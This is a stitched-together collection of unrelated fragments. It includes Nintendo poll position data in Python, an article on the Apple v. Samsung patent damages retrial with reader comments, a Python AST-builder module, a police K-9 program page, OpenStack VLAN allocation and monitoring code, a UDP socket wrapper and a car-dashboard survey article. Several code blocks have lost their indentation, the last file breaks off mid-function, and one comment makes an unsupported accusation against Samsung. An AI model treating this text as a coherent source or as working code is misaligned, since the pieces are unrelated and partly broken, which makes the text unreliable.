position_table[1] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2]
position_table[16] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1]
position_table[18] = [1, 1, 2, 1, 1, 3, 1, 1, 1, 1, 1, 4, 3]
position_table[21] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0]
position_table[36] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[40] = [2, 0, 1, 1, 1, 0, 0, 1, 1, 2]
position_table[49] = [1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 3, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[77] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0]
position_table[78] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[83] = [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[94] = [1, 1, 1, 3, 1, 1, 1, 1, 1, 2, 1, 1]
position_table[105] = [1, 1, 1, 1, 3, 5, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1]
position_table[110] = [1, 2, 2, 1, 1]
"""Data for the position table. Nintendo mixed these up to match the order votes were submitted in (I think)."""
"""Re-arranging the data in the position table would have been more effort, so the script only reads the values if there are any votes for the region."""
position_data = collections.OrderedDict()
position_data[1] = "A2A4C828AF52B964B478AA64AA73AA87AD9BA5969B96A09EADA5A2A987947F8E78A096A5919B9B8782A591AF82AF7AB978AA6EAA6DB364AF73B96BC05AA546AA55AF4BB437B95FC358BA46C350C82DBE26C623CD2DD237C837D728E14849395A"
position_data[16] = "A4862664E8648E1E4141C873D746CD9E7DA0B4467878B99B8746E35385BEC855C2AEE94D82DC4B6996C8A5AAE3699687E15AA064"
position_data[18] = "87BE3CA009981EA064AAC8C3F0A8E1AAC89BD7C3D4BDAAAA50AF1E695C405649505A3C787841647D8E89"
position_data[21] = "7C7D78739BC8695AAA5A71247D468D6B6E6E579887326946969BC896649B9119782D8C8C4BA58D4864B2677B647328194E19875A733E6E825A87"
position_data[36] = "37508FB0786914465A5A69A54B7D98B69B9E8AAF9687E6A07DAF82918C787DA2649B91B476988BA1EBAA5F7D8CBE91A52B6F67B2A5C8C8C899AE738CC8B9D7B4"
position_data[40] = "A05DAF7B1E7373737D5A739BAA5250823AA0"
position_data[49] = "D25E78D252E748E1AA87917D3C7819645A64E04EDC5FC8A0BE872EE628DF18D98C5A3C46A064AA5F7869B46C9191E249DC64EB37A53FAF5087419169A08C5037D2737337735AE440DC55557D2D5AD746E254B95D7D7D2341CD55E84CC87D714BAA7878914164CD69DC3F272F9B46C3645550F0BE"
position_data[77] = "8246DC465AB49196463CA06E28467864AA46E6E6C86E6E3296C87896C84678C88C14505A8C2D508CC8C8BE96"
position_data[78] = "B95A64966EDC9BC8C86E5F417837AF2D7350467841AA3CBEBE919664781E8C8C"
position_data[83] = "7D822328283C324B463264196432821E64466464786E82649682A08CA0A0BE96B9AABEBE96E63CB4"
position_data[94] = "645AC8418C6496288214B40AAA82D223BE08A0C882B4B46E32C8788232C8"
position_data[105] = "6E5F64E6A03C3C1EF852E65FCA739AD9A7E6B4E1C8E6EBE1641E7878503CC832AA73468C1E32A0968C28781E7832"
position_data[110] = "B4B4738732E67846D71E82B4507D"
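# Decoding sketch (an assumption, not part of the original data: each byte pair in
# a hex string above is an (x, y) map position, one pair per region entry):
def decode_positions(hex_string):
    values = [int(hex_string[i:i + 2], 16) for i in range(0, len(hex_string), 2)]
    return zip(values[0::2], values[1::2])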
"""Number of regions for each country."""
region_number = collections.OrderedDict()
region_number[1] = 47
region_number[10] = 24
region_number[16] = 27
region_number[18] = 13
region_number[20] = 13
region_number[21] = 33
region_number[22] = 7
region_number[25] = 22
region_number[30] = 22
region_number[36] = 32
region_number[40] = 10
region_number[42] = 25
region_number[49] = 52
region_number[52] = 25
region_number[65] = 8
region_number[66] = 9
region_number[67] = 3
region_number[74] = 17
region_number[76] = 6
region_number[77] = 26
region_number[78] = 16
region_number[79] = 13
region_number[82] = 8
region_number[83] = 20
region_number[88] = 3
region_number[94] = 12
region_number[95] = 13
region_number[96] = 5
region_number[97] = 16
region_number[98] = 7
region_number[105] = 17
region_number[107] = 21
region_number[108] = 23
region_number[110] = 5
language_num = collections.OrderedDict()
language_num[0] = "Japanese"
language_num[1] = "English"
language_num[2] = "German"
language_num[3] = "French"
language_num[4] = "Spanish"
language_num[5] = "Italian"
language_num[6] = "Dutch"
language_num[7] = "Portuguese"
language_num[8] = "French Canada"
"""Languages each country uses. The numbers correspond to the ones in the dictionary above."""
country_language = collections.OrderedDict()
country_language[1] = [1]
country_language[10] = [1, 4, 8]
country_language[16] = [1, 4, 7, 8]
country_language[18] = [1, 4, 8]
country_language[20] = [1, 4, 8]
country_language[21] = [1, 4, 8]
country_language[22] = [1, 4, 8]
country_language[25] = [1, 4, 8]
country_language[30] = [1, 4, 8]
country_language[36] = [1, 4, 8]
country_language[40] = [1, 4, 8]
country_language[42] = [1, 4, 8]
country_language[49] = [1, 4, 8]
country_language[52] = [1, 4, 8]
country_language[65] = [1]
country_language[66] = [2, 3, 5, 6]
country_language[67] = [2, 3, 5, 6]
country_language[74] = [1]
country_language[76] = [1]
country_language[77] = [3]
country_language[78] = [2]
country_language[79] = [1, 4, 7]
country_language[82] = [1]
country_language[83] = [5]
country_language[88] = [2, 3, 5, 6]
country_language[94] = [6]
country_language[95] = [1]
country_language[96] = [1]
country_language[97] = [1]
country_language[98] = [1, 4, 7]
country_language[105] = [4]
country_language[107] = [1]
country_language[108] = [2, 3, 5, 6]
country_language[110] = [1]
category_text = collections.OrderedDict()
category_text[0] = "Thoughts"
category_text[1] = "Personality"
category_text[2] = "Surroundings"
category_text[3] = "Experience"
category_text[4] = "Knowledge"
"""Poll categories. The keys correspond to the ones above."""
categories = collections.OrderedDict()
categories[0] = 3
categories[1] = 5
categories[2] = 7
categories[3] = 9
categories[4] = 10
|
According to witness lists filed with the U.S. District Court for the Northern District of California last week, the highest ranking Apple executive set to appear in court is Greg Joswiak, VP of product marketing. Samsung America's SVP of mobile product strategy and marketing Justin Denison is the most notable witness for the Korean tech giant.
Joswiak is expected to discuss Apple's marketing strategy for iPhone, the role patents-in-suit played in said marketing strategy, drivers of demand for both Apple and competitors' devices, and other relevant topics during his time on the stand. Denison will talk about related issues, particularly Samsung device repairability, "holistic design," consumer response to Samsung products and the wider smartphone market.
Richard Howarth, senior director of the Apple Design Team, is also expected to make an appearance at the trial, where he will offer testimony on the company's design process. As a co-inventor of two patents-in-suit, Howarth, like other witnesses, will discuss "article of manufacture," a key issue in the retrial.
Former Apple designer Susan Kare, known for creating icons and fonts for the original Macintosh's graphical user interface, will appear in court to provide expert testimony on icon and GUI design. She will also discuss a patent related to iPhone's home screen, specifically identifying articles of manufacture to which Samsung applied the IP.
As noted by CNET, which reported on the witness lists on Monday, Samsung may call on testimony from Apple CDO Jony Ive and SVP of worldwide marketing Phil Schiller via deposition.
Samsung might also read from depositions provided by former Apple designer Christopher Stringer, former patent chief Boris Teksler and former designer Shin Nishibori.
Apple and Samsung are slated to meet in court on May 14 to kick off a damages retrial. The action stems from Apple's 2012 victory over Samsung, in which a federal jury in the same jurisdiction granted the iPhone maker more than $1 billion in damages after it found Samsung guilty of infringing on various design and utility patents.
Apple's win was significantly whittled down in a subsequent damages retrial. A successful Samsung appeal to the U.S. Court of Appeals for the Federal Circuit, alongside other lower court revisions, brought the figure down to $548 million.
Samsung elevated the case to the Supreme Court, arguing that damages in patent trials should be assigned based on a part or portion of profits attributable to an infringing part, not profits on a complete device.
Previous precedent referenced an "article of manufacture" as an entire device, meaning damages in a patent infringement suit would be calculated based on whole device sales. For products like iPhone, that figure is a gargantuan sum. Instead, Samsung argued damages should be limited only to those parts of a device found in infringement of a plaintiff's patents.
The Supreme Court agreed with Samsung's assessment, and in a unanimous decision in 2016 rewrote the book on how damages can be meted out in U.S. patent cases. However, the highest court in the land, as well as the CAFC, failed to specify guidelines in identifying an appropriate "article of manufacture," and thus handed the case back to trial court for determination.
In the coming trial, Samsung will continue to advocate for a restricted reading of articles of manufacture as it applies to iPhone, seeking to limit the scope of past damages rulings to a small number of individual components. Apple, meanwhile, will seek to prove Samsung's infringement of certain iPhone features is worthy of a more traditional view of article of manufacture.
The damages should have been twice the initial claim. It’s a travesty that they were reduced at all. Samsung’s entire modern telephony business is entirely dependent on what it stole from Apple.
I mean that oxymoron called the US justice system.
Oh my God. Why is this taking a decade to end!
It was reported in Korea that Samsung was behind the mocking of the families of the ferry accident that happened a few years ago. The families were fasting to protest the botched rescue effort when a ferry carrying hundreds of students sank. Samsung paid a bunch of right wing goons to mock the fasting families by eating pizza and chicken next to the families of the victims and raising a ruckus. This company is the most vile and disgusting company in the world. All their products should be boycotted. We should urge Apple not to use Samsung components in any of its products.
Careful there, buddy. Someone’s liable to drag out that old dead horse about Xerox Parc.
Not only dead, but totally untrue to start with.
import ast
NoneValue = object()
mappednames = [
False,
True,
NotImplemented,
Ellipsis
]
try:
basestring
except:
basestring = (str, bytes)
numbers = (int, float)
def coerce(obj):
if any(i is obj for i in mappednames):
return Name(str(obj))
if obj is NoneValue:
return Name('None')
if isinstance(obj, basestring):
return Str(obj)
if isinstance(obj, numbers):
return Num(obj)
if isinstance(obj, list):
return List(obj)
if isinstance(obj, dict):
return Dict(obj)
if isinstance(obj, tuple):
return Tuple(obj)
return obj
def coerce_list(obj):
return [ coerce(i) for i in obj ]
def coerce_dict(obj, valuesonly=False):
kcoerce = coerce
if valuesonly:
kcoerce = lambda x: x
return { kcoerce(k): coerce(v) for (k, v) in obj.items() }
def maybe_ast(obj):
if obj is None:
return
return obj._get_ast()
def _get_list_ast(obj):
return [ i._get_ast() for i in obj ]
class AstNode(object):
def _make_lvalue(self):
raise TypeError("Cannot make an lvalue of %s (non-expression)" % self.__class__.__name__)
class Expression(AstNode):
def __call__(self, *a, **kw):
return Call(self, *a, **kw)
def _assign(self, value):
return Assign(self, value)
def __getattr__(self, name):
return Attribute(self, name)
def _make_lvalue(self):
raise TypeError("Cannot make an lvalue of %s" % self.__class__.__name__)
class Statement(AstNode):
pass
def make_statement(node):
if isinstance(node, Expression):
return Expr(node)
return node
class Expr(Statement):
def __init__(self, value):
self.value = coerce(value)
def _get_ast(self):
return ast.Expr(self.value._get_ast())
class Num(Expression):
def __init__(self, n=None):
self.n = n
def _get_ast(self):
return ast.Num(self.n)
class Str(Expression):
def __init__(self, s=None):
self.s = s
def _get_ast(self):
return ast.Str(s=self.s)
class Assign(Statement):
def __init__(self, target, source):
self.target = target._make_lvalue()
self.source = coerce(source)
def _get_ast(self):
return ast.Assign(
[ self.target._get_ast() ],
self.source._get_ast()
)
class Call(Expression):
def __init__(self, func, *a, **kw):
self.func = func
self.a = None
self.kw = None
if '_kwargs' in kw:
self.kw = coerce_dict(kw.pop('_kwargs'))
if '_args' in kw:
self.a = coerce_list(kw.pop('_args'))
self.args = coerce_list(a)
self.kwargs = coerce_dict(kw, valuesonly=True)
def _get_ast(self):
kwlist = []
for k, v in self.kwargs.items():
kwlist.append(ast.keyword(
arg=k,
value=v._get_ast()
))
return ast.Call(
func=self.func._get_ast(),
args=_get_list_ast(self.args),
keywords=kwlist,
starargs=maybe_ast(self.a),
kwargs=maybe_ast(self.kw)
)
ctx_type_to_factory = {
'load': ast.Load,
'store': ast.Store
}
class Name(Expression):
def __init__(self, id=None, ctx='load'):
if not isinstance(id, str):
id = id.decode('UTF-8')
self.name = id
self.ctx = ctx
def _make_lvalue(self):
return Name(id=self.name, ctx='store')
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Name(self.name, ctx)
class Attribute(Expression):
def __init__(self, value=None, attr=None, ctx='load'):
self.value = coerce(value)
self.attr = attr
self.ctx = ctx
def _make_lvalue(self):
return Attribute(self.value, self.attr, 'store')
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Attribute(self.value._get_ast(), self.attr, ctx)
class Dict(Expression):
def __init__(self, value=None):
value = value or {}
keys = []
values = []
for k, v in value.items():
keys.append(k)
values.append(v)
self.keys = coerce_list(keys)
self.values = coerce_list(values)
def _get_ast(self):
return ast.Dict(_get_list_ast(self.keys), _get_list_ast(self.values))
class Tuple(Expression):
def __init__(self, value=None, ctx='load'):
value = list(value) if value else []
self.values = coerce_list(value)
self.ctx = ctx
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.Tuple(_get_list_ast(self.values), ctx)
def _make_lvalue(self):
return Tuple([ i._make_lvalue() for i in self.values ], 'store')
class List(Expression):
def __init__(self, value=None, ctx='load'):
value = value or []
self.values = coerce_list(value)
self.ctx = ctx
def _get_ast(self):
ctx = ctx_type_to_factory[self.ctx]()
return ast.List(_get_list_ast(self.values), ctx)
def _make_lvalue(self):
return List([ i._make_lvalue() for i in self.values ], 'store')
try:
from collections.abc import MutableSequence
except ImportError:
from collections import MutableSequence
class StatementList(MutableSequence):
def __init__(self, initial=None):
self.list = []
if initial:
self += initial
def coerce(self, o):
return make_statement(o)
def __getitem__(self, i):
return self.list[i]
def __setitem__(self, i, v):
self.list[i] = self.coerce(v)
def __delitem__(self, i):
del self.list[i]
def __len__(self):
return len(self.list)
def insert(self, i, o):
return self.list.insert(i, self.coerce(o))
def __iadd__(self, value):
if isinstance(value, AstNode):
self.append(value)
else:
super(StatementList, self).__iadd__(value)
return self
class For(Statement):
def __init__(self, vars=None, iterable=None, body=[], orelse=[]):
self.body = StatementList(body)
self.orelse = StatementList(orelse)
self.vars = vars
self.iterable = coerce(iterable)
@property
def vars(self):
return self._vars
@vars.setter
def vars(self, value):
if value is not None:
value = coerce(value)._make_lvalue()
self._vars = value
def _get_ast(self):
return ast.For(
self._vars._get_ast(),
self.iterable._get_ast(),
_get_list_ast(self.body),
_get_list_ast(self.orelse)
)
class If(Statement):
def __init__(self, condition=None, body=[], orelse=[]):
self.body = StatementList(coerce_list(body))
self.orelse = StatementList(coerce_list(orelse))
self.condition = coerce(condition)
def _get_ast(self):
return ast.If(
self.condition._get_ast(),
_get_list_ast(self.body),
_get_list_ast(self.orelse)
)
class Return(Statement):
def __init__(self, expression=None):
self.expression = coerce(expression)
def _get_ast(self):
return ast.Return(self.expression._get_ast())
if __name__ == '__main__':
forri = For(Name('a'), [ 1, 2, 3 ])
forri.body += Name('print')(Name('a'))
iffi = If(True)
iffi.body += forri
tree = iffi._get_ast()
print(ast.dump(tree))
import astor
print(astor.codegen.to_source(tree))
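    # Not part of the original demo: a minimal sketch of actually running the
    # generated statements, assuming Python 3.8+ (where ast.Module requires a
    # type_ignores field; older versions take ast.Module(body=[tree])).
    module = ast.fix_missing_locations(ast.Module(body=[tree], type_ignores=[]))
    exec(compile(module, '<generated>', 'exec'))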
|
The Lakeway Police Department K-9 Program was established in 2013 with the addition of K-9 "Orka", who was donated to the department by the Austin Police Department. From that point, the program was expanded with the addition of K-9 "Cory", who was purchased and trained with the financial assistance of the Lakeway Police Foundation. Both K-9s and their respective handlers were trained and certified by the National Narcotics Detector Dog Association in the detection of various narcotics including, but not limited to: cocaine, marijuana, methamphetamine, and heroin. The K-9s also received basic training in tracking, which provided LPD with the ability to track/search for fleeing fugitives and missing persons.
Since then, "Orka" has retired after a long and successful law enforcement tenure. A new addition to the Police Department was recently made with the donation of K-9 "Rino". Lakeway citizen and recent citizens police academy graduate Melanie DeMayo made a very generous financial donation to the Lakeway Police Foundation for the sole purpose of acquiring a new police dog. "Rino" will be trained in drug detection and tracking skills. His training will last for 5-6 weeks, and then he will come to his new handler, LPD Officer Gilbert Hernandez, for additional training and acclimation. Officer Hernandez is a retired Travis County deputy and master K-9 handler/trainer who recently joined LPD. We expect our newest K-9 team to be on patrol in August 2018.
K-9 "Cory" is assigned to Patrol Officer Sheldon Banta who, in addition to normal patrol functions, is responsible for seeking out those who are in possession of illicit narcotics and/or drug paraphernalia in Lakeway. K-9 "Cory" and her handler are also tasked with public appearances at local schools and other community events in the Lake Travis area. |
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_log import log
from six import moves
import sqlalchemy as sa
from neutron._i18n import _, _LE, _LI, _LW
from neutron.common import exceptions as exc
from neutron.db import api as db_api
from neutron.db import model_base
from neutron.plugins.common import constants as p_const
from neutron.plugins.common import utils as plugin_utils
from neutron.plugins.ml2.drivers import helpers
LOG = log.getLogger(__name__)
class L3OutVlanAllocation(model_base.BASEV2):
"""Represent allocation state of a vlan_id for the L3 out per VRF.
If allocated is False, the vlan_id is available for allocation.
If allocated is True, the vlan_id is in use.
When an allocation is released, if the vlan_id is inside the pool
described by network_vlan_ranges, then allocated is set to
False. If it is outside the pool, the record is deleted.
"""
__tablename__ = 'apic_ml2_l3out_vlan_allocation'
__table_args__ = (
sa.Index('apic_ml2_l3out_vlan_allocation_l3out_network_allocated',
'l3out_network', 'allocated'),
model_base.BASEV2.__table_args__,)
l3out_network = sa.Column(sa.String(64), nullable=False,
primary_key=True)
vrf = sa.Column(sa.String(64), nullable=False,
primary_key=False)
vlan_id = sa.Column(sa.Integer, nullable=False, primary_key=True,
autoincrement=False)
allocated = sa.Column(sa.Boolean, nullable=False)
class NoVlanAvailable(exc.ResourceExhausted):
message = _("Unable to allocate the vlan. "
"No vlan is available for %(l3out_network)s external network")
# inherit from SegmentTypeDriver to reuse the code to reserve/release
# vlan IDs from the pool
class L3outVlanAlloc(helpers.SegmentTypeDriver):
def __init__(self):
super(L3outVlanAlloc, self).__init__(L3OutVlanAllocation)
def _parse_vlan_ranges(self, ext_net_dict):
self.l3out_vlan_ranges = {}
for l3out_network in ext_net_dict.keys():
try:
ext_info = ext_net_dict.get(l3out_network)
vlan_ranges_str = ext_info.get('vlan_range')
if vlan_ranges_str:
vlan_ranges = vlan_ranges_str.strip().split(',')
for vlan_range_str in vlan_ranges:
vlan_min, vlan_max = vlan_range_str.strip().split(':')
vlan_range = (int(vlan_min), int(vlan_max))
plugin_utils.verify_vlan_range(vlan_range)
self.l3out_vlan_ranges.setdefault(
l3out_network, []).append(vlan_range)
except Exception:
LOG.exception(_LE("Failed to parse vlan_range for L3out %s"),
l3out_network)
LOG.info(_LI("L3out VLAN ranges: %s"), self.l3out_vlan_ranges)
def sync_vlan_allocations(self, ext_net_dict):
session = db_api.get_session()
self._parse_vlan_ranges(ext_net_dict)
with session.begin(subtransactions=True):
# get existing allocations for all L3 out networks
allocations = dict()
allocs = (session.query(L3OutVlanAllocation).
with_lockmode('update'))
for alloc in allocs:
if alloc.l3out_network not in allocations:
allocations[alloc.l3out_network] = set()
allocations[alloc.l3out_network].add(alloc)
# process vlan ranges for each configured l3out network
for (l3out_network,
vlan_ranges) in self.l3out_vlan_ranges.items():
# determine current configured allocatable vlans for
# this l3out network
vlan_ids = set()
for vlan_min, vlan_max in vlan_ranges:
vlan_ids |= set(moves.xrange(vlan_min, vlan_max + 1))
# remove from table unallocated vlans not currently
# allocatable
if l3out_network in allocations:
for alloc in allocations[l3out_network]:
try:
# see if vlan is allocatable
vlan_ids.remove(alloc.vlan_id)
except KeyError:
# it's not allocatable, so check if its allocated
if not alloc.allocated:
# it's not, so remove it from table
LOG.debug("Removing vlan %(vlan_id)s on "
"l3out network "
"%(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network':
l3out_network})
session.delete(alloc)
del allocations[l3out_network]
# add missing allocatable vlans to table
for vlan_id in sorted(vlan_ids):
alloc = L3OutVlanAllocation(l3out_network=l3out_network,
vrf='',
vlan_id=vlan_id,
allocated=False)
session.add(alloc)
# remove from table unallocated vlans for any unconfigured
# l3out networks
            for allocs in allocations.values():
for alloc in allocs:
if not alloc.allocated:
LOG.debug("Removing vlan %(vlan_id)s on l3out "
"network %(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network':
alloc.l3out_network})
session.delete(alloc)
def get_type(self):
return p_const.TYPE_VLAN
def reserve_vlan(self, l3out_network, vrf, vrf_tenant=None):
vrf_db = L3outVlanAlloc._get_vrf_name_db(vrf, vrf_tenant)
session = db_api.get_session()
with session.begin(subtransactions=True):
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=vrf_db))
count = query.update({"allocated": True})
if count:
LOG.debug("reserving vlan %(vlan_id)s for vrf "
"%(vrf)s on l3out network %(l3out_network)s from "
"pool. Totally %(count)s rows updated.",
{'vlan_id': query[0].vlan_id,
'vrf': vrf_db,
'l3out_network': l3out_network,
'count': count})
return query[0].vlan_id
# couldn't find this vrf, allocate vlan from the pool
# then update the vrf field
filters = {}
filters['l3out_network'] = l3out_network
alloc = self.allocate_partially_specified_segment(
session, **filters)
if not alloc:
raise NoVlanAvailable(l3out_network=l3out_network)
filters['vlan_id'] = alloc.vlan_id
query = (session.query(L3OutVlanAllocation).
filter_by(allocated=True, **filters))
count = query.update({"vrf": vrf_db})
if count:
LOG.debug("updating vrf %(vrf)s vlan "
"%(vlan_id)s on l3out network %(l3out_network)s to "
"pool. Totally %(count)s rows updated.",
{'vrf': vrf_db,
'vlan_id': alloc.vlan_id,
'l3out_network': l3out_network,
'count': count})
LOG.debug("reserving vlan %(vlan_id)s "
"on l3out network %(l3out_network)s from pool",
{'vlan_id': alloc.vlan_id,
'l3out_network': l3out_network})
return alloc.vlan_id
def release_vlan(self, l3out_network, vrf, vrf_tenant=None):
vrf_db = L3outVlanAlloc._get_vrf_name_db(vrf, vrf_tenant)
session = db_api.get_session()
with session.begin(subtransactions=True):
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=vrf_db))
count = query.update({"allocated": False})
if count:
LOG.debug("Releasing vlan %(vlan_id)s on l3out "
"network %(l3out_network)s to pool. "
"Totally %(count)s rows updated.",
{'vlan_id': query[0].vlan_id,
'l3out_network': l3out_network,
'count': count})
return
LOG.warning(_LW("No vlan_id found for vrf %(vrf)s on l3out "
"network %(l3out_network)s"),
{'vrf': vrf_db,
'l3out_network': l3out_network})
# None is returned if not found
@staticmethod
def get_vlan_allocated(l3out_network, vrf, vrf_tenant=None):
session = db_api.get_session()
query = (session.query(L3OutVlanAllocation).
filter_by(l3out_network=l3out_network,
vrf=L3outVlanAlloc._get_vrf_name_db(
vrf, vrf_tenant),
allocated=True))
if query.count() > 0:
return query[0].vlan_id
@staticmethod
def _get_vrf_name_db(vrf, vrf_tenant):
        return "%s/%s" % (vrf_tenant, vrf) if vrf_tenant else vrf
def initialize(self):
return
def is_partial_segment(self, segment):
return True
def validate_provider_segment(self, segment):
return
def reserve_provider_segment(self, session, segment):
return
def allocate_tenant_segment(self, session):
return
def release_segment(self, session, segment):
return
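# Illustrative usage sketch (not part of the original driver); it assumes a
# running neutron server with this type driver loaded, and an external-network
# config dict of the shape parsed by _parse_vlan_ranges() above:
#
#   driver = L3outVlanAlloc()
#   driver.sync_vlan_allocations({'l3out-1': {'vlan_range': '100:109'}})
#   vlan_id = driver.reserve_vlan('l3out-1', 'vrf-1', vrf_tenant='tenant-a')
#   ...
#   driver.release_vlan('l3out-1', 'vrf-1', vrf_tenant='tenant-a')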
|
At Maravanthe in coastal Karnataka, the narrow strip of land (as seen in the above picture) has the backwaters of Sowparnika river on one side and the Arabian sea on the other.
Wow, good road connectivity.
Yeah, it's a nice long stretch.
Glad you liked it. Have sent you a mail. |
#!/usr/bin/env python3
#
# NAME
#
# dgmsocket class
#
# DESCRIPTION
#
#       The 'dgmsocket' class provides a very simple wrapper around the
#       standard Python socket API.
#
# More specifically, this class provides datagram socket services.
#
# HISTORY
#
# 25 March 2006
# o Initial development implementation
#
# 06 December 2011
# o Clean-up the socket communication
#
import socket
class C_dgmsocket :
#
# Member variables
#
# - Core variables
mstr_obj = 'C_dgmsocket' # name of object class
mstr_name = 'void' # name of object variable
m_id = -1 # id of agent
m_iter = 0 # current iteration in an
# arbitrary processing
# scheme
m_verbosity = 0 # debug related value for
# object
m_warnings = 0 # show warnings
# (and warnings level)
#
# - Class variables
m_dgmsocket = None
mstr_remoteHost = 'localhost'
m_port = 1701
#
# Methods
#
# Core methods - construct, initialise, id
def core_construct( self,
astr_obj = 'C_dgmsocket',
astr_name = 'void',
a_id = -1,
a_iter = 0,
a_verbosity = 0,
a_warnings = 0) :
self.mstr_obj = astr_obj
self.mstr_name = astr_name
self.m_id = a_id
self.m_iter = a_iter
self.m_verbosity = a_verbosity
self.m_warnings = a_warnings
    def __str__(self):
        lines = ['mstr_obj\t\t= %s' % self.mstr_obj,
                 'mstr_name\t\t= %s' % self.mstr_name,
                 'm_id\t\t\t= %d' % self.m_id,
                 'm_iter\t\t\t= %d' % self.m_iter,
                 'm_verbosity\t\t= %d' % self.m_verbosity,
                 'm_warnings\t\t= %d' % self.m_warnings,
                 'This class provides a *very* simple wrapper around datagram sockets.']
        return '\n'.join(lines)
def __init__(self, astr_hostname = 'localhost', a_port = 1701):
self.core_construct()
self.mstr_remoteHost = astr_hostname
self.m_port = a_port
self.m_dgmsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
def tx(self, str_payload):
self.m_dgmsocket.sendto(str_payload.encode(), (self.mstr_remoteHost, self.m_port))
def write(self, str_payload):
self.m_dgmsocket.sendto(str_payload.encode(), (self.mstr_remoteHost, self.m_port))
def close(self):
self.m_dgmsocket.close()
def flush(self):
pass
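if __name__ == '__main__':
    # Minimal usage sketch (not part of the original module); the host and
    # port are illustrative and simply echo the class defaults.
    dgm = C_dgmsocket('localhost', 1701)
    dgm.tx('hello over UDP')
    dgm.close()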
|
Confusing cars: how well do you really know your dashboard?
Do you know your air con symbol from your air bag warning light? New research has found that 70% of drivers don’t understand all the symbols on their dashboard, while one in ten admit they hardly know what any of them mean.
The research was carried out by back-to-basics brand Dacia, which also discovered that 84% of the population believe gadgets have become too complicated, with less than a quarter able to use all of their cars’ functions.
Ignorant motorists aren’t new – a 2013 survey by Britannia Rescue asked drivers about warning symbols, and revealed that around 35% of people don’t recognise an airbag warning, while 71% of motorists are confused by a tyre pressure warning light, with 25% believing it related to the brakes.
But it’s not just warning symbols that are the problem. Infotainment systems, satnav and other connectivity features have added a plethora of symbols, while hybrid drive systems and the emergence of self-driving cars will no doubt add more warnings and tech.
As well as a lack of awareness regarding warning lights, motorists also admitted they use only two-thirds of the available settings in their cars – surprising considering the ever-increasing levels of tech on offer, such as infotainment systems.
More gadgets mean more warning lights too, with satnav and infotainment settings giving motorists even more symbols to decode. So, considering that only 10% of drivers can identify the symbols for headlights, horn and air conditioning, are ever-increasing levels of tech really a good idea?
Part of Dacia’s appeal is its back-to-basics approach when it comes to tech, but for the majority of manufacturers infotainment systems and other forms of tech are high on the agenda – just take a look at the futuristic cabin of the latest Audi A8.
Do you know all of your car’s warning lights? Should manufacturers make things easier to understand, or is it our own responsibility to know what they all mean? Let us know in the comments! |
# Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import base64
import copy
import json
import logging
from django.conf import settings
from django.contrib import messages
from django import http
from django.http import HttpResponse
from django.urls import reverse_lazy
from django.utils.translation import ugettext_lazy as _ # noqa
from django.views.decorators.csrf import csrf_exempt
from django.views import generic
from django.views.generic import TemplateView
from horizon import exceptions
from openstack_auth import utils as auth_utils
from openstack_dashboard import policy
import urllib.error
import urllib.parse
import urllib.request
from monitoring.alarms import tables as alarm_tables
from monitoring import api
from monitoring.overview import constants
LOG = logging.getLogger(__name__)
STATUS_FA_ICON_MAP = {'btn-success': "fa-check",
'btn-danger': "fa-exclamation-triangle",
'btn-warning': "fa-exclamation",
'btn-default': "fa-question-circle"}
def get_icon(status):
return STATUS_FA_ICON_MAP.get(status, "fa-question-circle")
priorities = [
{'status': 'btn-success', 'severity': 'OK'},
{'status': 'btn-default', 'severity': 'UNDETERMINED'},
{'status': 'btn-warning', 'severity': 'LOW'},
{'status': 'btn-warning', 'severity': 'MEDIUM'},
{'status': 'btn-warning', 'severity': 'HIGH'},
{'status': 'btn-danger', 'severity': 'CRITICAL'},
]
index_by_severity = {d['severity']: i for i, d in enumerate(priorities)}
def get_dashboard_links(request):
#
